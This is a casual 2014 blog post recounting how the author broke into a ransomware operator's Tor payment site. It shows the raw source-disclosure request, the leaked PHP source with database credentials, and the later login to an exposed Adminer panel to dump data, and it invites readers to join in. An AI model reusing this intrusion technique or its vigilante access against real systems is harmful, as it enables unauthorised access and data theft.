" Cryptolocker … you little shit. | TGHC

Cryptolocker … you little shit.

So, readers if you already know me personally  you know what too expect, if you don’t, you might have a hard time with my writing skills (I mean lack of) … I’m quite terrible at it, but the information is accurate. if it frustrates you, maybe best you don’t scroll down.

 

- Looking at some of the feedback from the infosec community I’d say what I was dealing with was a variant of randsomware similar to cryptolocker. when I wrote the post below I had the assumption it was cryptolocker – so apologies for the in-adverted link-baiting.

A friend of mine had recently been stung by cryptolocker so I thought I’d have a look at it. Cryptolocker basically encrypts certain file types you have access too (your files) and say’s “You Pay me Bro if you want to see them files again… soon’  … it has your files and there is a timer on how long you have to decide to pay or lose those files . Not cool.

The way the bad guys want paying is usually via Bitcoin via the TOR Network, they explain in there graphic how to download the vidalia TOR bundle so you can reach the .onion website (websites hosted on the TOR network do not resolve over common DNS and always end in .onion,  What’s cool for us is that the graphic presented on my pals machine is static, so the address that is presented always has to be that address, they have to keep the box online *cough-its-still-there-cough* , anyway I took the address 4sfxctgp53imlvzk.onion To get myself in a comfortable position to have a good old poke around I hooked up Burp Suite Pro and Firefox  and TOR the settings where use SOCKS Proxy, 127.0.0.1 host and 9050 for the port, cool. piece of piss.

Burp Tor

 

 

Luckily for me Steve Lord was hanging out with me this night, we just had some grub and where drinking whiskey and watching Super Jail politely chipping away, some not very useful stuff. on an apptest I would report but for my goals … I need to get in …not to improve posture SO … a while back Dec 20th 2013 I noticed an issue with some randsome-ware echoing out it’s localhost connection details when requesting favicon from it’s server https://twitter.com/torservers/status/414060509382455296 http://pastebin.com/Uq37CDR3 I thought i’d see if the same issue worked here (why not, I have whiskey, cartoons and a Steve Lord) Didn’t quite work …but this did…

GET /index.php%3C HTTP/1.1
Host: 4sfxctgp53imlvzk.onion
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=7ms6io53cb73k3u47n4jivr4c5
Connection: keep-alive

Returned this

HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Sun, 16 Feb 2014 02:07:25 GMT
Content-Type: application/octet-stream
Content-Length: 12931
Last-Modified: Sun, 16 Feb 2014 00:17:41 GMT
Connection: keep-alive
Accept-Ranges: bytes

<?php
session_start();
define('DBHOST', 'localhost');
define('DBUSER', '<strong>site</strong>');
define('DBPASS', '<strong>Be6mybCWhpFpgG4u</strong>');//Dostep do sql za miana!!! <strong>&lt;-- polish </strong>
define('DBNAME', 'site');
mysql_connect(DBHOST, DBUSER, DBPASS);
mysql_select_db(DBNAME);
$errors = $success = "";
if(isset($_GET['captcha']) &amp;&amp; $_GET['captcha'] == 1){
include('kcaptcha6791/kcaptcha.php');
$captcha = new KCAPTCHA();
if($_REQUEST[session_name()]){
$_SESSION['captcha_keystring'] = $captcha-&gt;getKeyString();
}
exit(); blah blah blah...

Sweet, that might come in handy later… any way picked away at it for a good 90 minutes looking at known vulns on webserver (DoS) and seeing what the value was of the issues found so far (little XSS, possible DoS and some lesser crap) not very meaningful to the goal and if it’s DoSsed then other people may miss out on recovery (if they are willing to pay) .

Got pissed with Steve pass out.

Next Day, I see Steve off and drag my arse down to my local greasy spoon cafe, but before I do, I hook up DIRBuster and set a 2nd burp listener to push it through, I push it through burp so it resolves via Burp’s TOR configuration and I set up a 2nd listener to separate tools – 8080 does browser, 8088 does DIRBuster so on and so fourth using burps filter by port feature (nice) … Off I go, later on in the afternoon I have one of those “Oh shit yeah, I was hacking something”  thoughts and get back to my box nope, nope, nope nope… nop nopnoponponpno nothing exiting BUT WAIT

Black-dynamite-you-done-fd-up-now

 

What is this ? 301 Redirect to /mysql/ I don’t  have the screen shot of the login at hand but if I find it I’ll modify this bit. I’m greeted with a web interface of some software called  Adminer version 3.7.1 and the information it requires is a username, a password and a database, because this is on the box I can use the details from yesterday ! – sweet.

  • Can I read from the hard disk to each /etc/hosts or possibly even the Key ?!
  • Can I identify it’s Public IP / Hostname ?

Not really :/

Partial hostname is DS791732 (if that means anything to anyone speak up) a few more hours after I got into this area, they where on to me and can no longer reach the /mysql interface :( but the link is still there taking money… I think they flush it now and then I only saw 12 entries some paid some probes   I took a dump of the database and a few screenshots I thought you lot might like this as a read. .. be interested to see if anyone else can cause these little shits a headache… I imagine there is more to come.

 

Screen Shot 2014-02-03 at 11.12.27

I could as a limited user view a bit of the database

 

Screen Shot 2014-02-01 at 19.14.55

Tool Kit

  1. Tor
  2. Firefox
  3. Burpsuite (Pro ?) / Free
  4. DirBuster
  5. OS … whatever